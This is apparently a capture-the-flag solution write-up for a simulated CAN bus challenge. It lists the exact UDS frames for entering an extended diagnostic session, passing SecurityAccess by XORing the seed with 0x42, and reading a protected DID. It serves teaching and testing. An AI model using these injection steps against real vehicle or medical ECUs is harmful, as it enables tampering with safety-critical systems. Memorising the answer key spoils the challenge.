# CAN Bus Implant — Solution

## Overview

Simulated CAN bus with background traffic and UDS (Unified Diagnostic Services) protocol. Player sniffs traffic to identify patterns, then injects UDS frames to gain security access and read a protected DID.

## Steps

1. Open two terminals — one for sniffing, one for injection:

```bash
# Terminal 1: Sniff
nc <host> 3600

# Terminal 2: Inject
nc <host> 3601
```

2. Observe traffic on the sniff port. Note the following patterns:
   - `0x100`: Heartbeat (periodic counter)
   - `0x200-0x203`: Sensor data (temperature, heart rate)
   - `0x7DF`: OBD broadcast diagnostic request
   - `0x7E0` → `0x7E8`: UDS request/response pair (periodic VIN read)

3. On the inject port, enter extended diagnostic session:

```
send 7E0 02 10 03 00 00 00 00 00
```

Response on sniff shows `0x7E8` with positive response `50 03`.

4. Request a security seed:

```
send 7E0 02 27 01 00 00 00 00 00
```

Response contains 4-byte seed: `67 01 XX XX XX XX`.

5. Compute the key by XORing each seed byte with `0x42`, then send:

```
send 7E0 06 27 02 KK KK KK KK 00
```

Positive response: `67 02`.

6. Read the flag from DID 0xFF01:

```
send 7E0 03 22 FF 01 00 00 00 00
```

Response contains the flag.

## Key Concepts

- **CAN bus**: Controller Area Network — no authentication, broadcast medium, used in vehicles and medical equipment
- **UDS (ISO 14229)**: Diagnostic protocol with services like DiagnosticSessionControl, SecurityAccess, ReadDataByIdentifier
- **SecurityAccess**: Challenge-response authentication — ECU sends seed, tester must compute correct key
- **Traffic analysis**: Identifying request/response patterns and protocol types from raw bus traffic